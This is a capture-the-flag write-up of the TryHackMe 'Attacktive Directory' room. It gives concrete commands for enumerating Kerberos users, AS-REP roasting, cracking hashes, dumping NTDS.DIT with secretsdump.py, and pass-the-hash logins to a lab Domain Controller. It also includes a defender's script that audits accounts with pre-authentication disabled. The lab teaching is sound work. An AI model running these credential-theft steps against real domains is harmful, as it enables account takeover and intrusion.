Attacking Active Directory — TryHackMe
Hey guys, this is a write-up for the TryHackMe room "Attacktive Directory". In this room we are going to exploit a vulnerable Domain Controller (DC).
Prerequisite
Install: Impacket and Kerbrute
Enumeration
Starting off, we are going to use Nmap to enumerate the machine:
nmap -sC -sV 10.10.2.10 -vv
Useful info:
Port 88: Kerberos-sec
Port 389: LDAP
DNS Domain: spookysec.local
DNS Computer Name: AttacktiveDirectory.spookysec.local
Enumerating Users with Kerbrute
After installing Kerbrute we are going to use the userenum command with the user list that the creator of the room provided to find valid usernames on the domain.
./kerbrute userenum --dc spookysec.local -d spookysec.local /root/attacktivedirectory/users.txt -t 100
From the results above, two important users are “svc-admin” and “backup”.
Exploitation
After enumerating we will try to exploit a feature of Kerberos with an attack called "AS-REP roasting".
AS-REP roasting is possible when a user account has the "Does not require Pre-Authentication" setting enabled. This means the KDC will hand out a ticket-granting response (AS-REP) for that account without the requester first proving knowledge of the account's password, and part of that response is encrypted with a key derived from the user's password, so it can be cracked offline.
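As an added example (mine, not part of the original write-up), this is how a defender would audit for the setting that makes AS-REP roasting possible: decoding the DONT_REQ_PREAUTH bit (0x400000) of each account's userAccountControl attribute. The LDIF text and account names are constructed sample data, not output from the room's DC.

```python
# Constructed LDIF-style sample, modelled on what an LDAP export would contain.
# On a live domain the equivalent query is
#   Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
# or the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

SAMPLE_LDIF = """\
dn: CN=svc-admin,CN=Users,DC=spookysec,DC=local
sAMAccountName: svc-admin
userAccountControl: 4194816

dn: CN=backup,CN=Users,DC=spookysec,DC=local
sAMAccountName: backup
userAccountControl: 512

dn: CN=oldsvc,CN=Users,DC=spookysec,DC=local
sAMAccountName: oldsvc
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Yield (sAMAccountName, userAccountControl) for every entry in the LDIF text."""
    for block in text.strip().split("\n\n"):
        attrs = dict(line.split(": ", 1) for line in block.splitlines() if ": " in line)
        yield attrs["sAMAccountName"], int(attrs["userAccountControl"])


def preauth_disabled(uac):
    """True when the account will answer an AS-REQ without pre-authentication."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def asrep_roastable(text, include_disabled=False):
    """Names of accounts exposed to AS-REP roasting (disabled ones skipped by default)."""
    hits = []
    for name, uac in parse_ldif(text):
        if preauth_disabled(uac) and (include_disabled or not (uac & UF_ACCOUNTDISABLE)):
            hits.append(name)
    return hits


def remediated_uac(uac):
    """The userAccountControl value to write back so pre-authentication is required again."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(SAMPLE_LDIF))  # ['svc-admin']
```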
We are going to use the GetNPUsers.py tool found in the "impacket" folder to request the AS-REP hash of the user "svc-admin" from the Key Distribution Center (KDC).
GetNPUsers.py -dc-ip 10.10.2.10 spookysec.local/svc-admin -no-pass
Then, we are going to use John the Ripper to crack the hash:
john hash --wordlist=pass.txt
Now that we have the credentials for the "svc-admin" user, we can enumerate SMB shares to check whether there is any useful information.
smbclient -L \\\\10.10.2.10\\ -U svc-admin → to list shared folders
There are some common shared folders like C$, IPC$, NETLOGON, etc.
The share "backup" seems interesting.
smbclient \\\\10.10.2.10\\backup -U svc-admin → to connect to the server using smb
Inside the folder there is an interesting file:
Inside the file there is a base64-encoded string:
echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d → to decode it
The result is the credentials of the user "backup@spookysec.local".
Privilege Escalation
We are going to use a tool from impacket called secretsdump.py. With it we dump NTDS.DIT, the database that contains the password hashes of every user synced with Active Directory. Pen-testers use this tool for password auditing: they crack the dumped hashes to check whether users are choosing strong passwords.
secretsdump.py spookysec.local/backup:'backup2517860'@10.10.2.10 -just-dc
We found the password hash of the Administrator account. We can use it to connect to the domain controller with administrator privileges.
We can use the pass-the-hash method for the Administrator account because we already have its NTLM hash from the secretsdump.py output.
Pass the Hash is a technique that allows an attacker to authenticate to a remote server or service by using the NTLM or LanMan hash of a user's password instead of the plaintext password that is normally required.
To connect to the server we can use psexec.py or evil-winrm (psexec.py expects the hash as LMHASH:NTHASH, evil-winrm takes only the NT hash):
psexec.py Administrator@10.10.2.10 -hashes <LMHASH>:<NTHASH>
OR
evil-winrm -i 10.10.2.10 -u Administrator -H <NTHASH>
The flags are located in the Desktop directory of each user's profile.
Capturing the flags brings us to the completion of the room.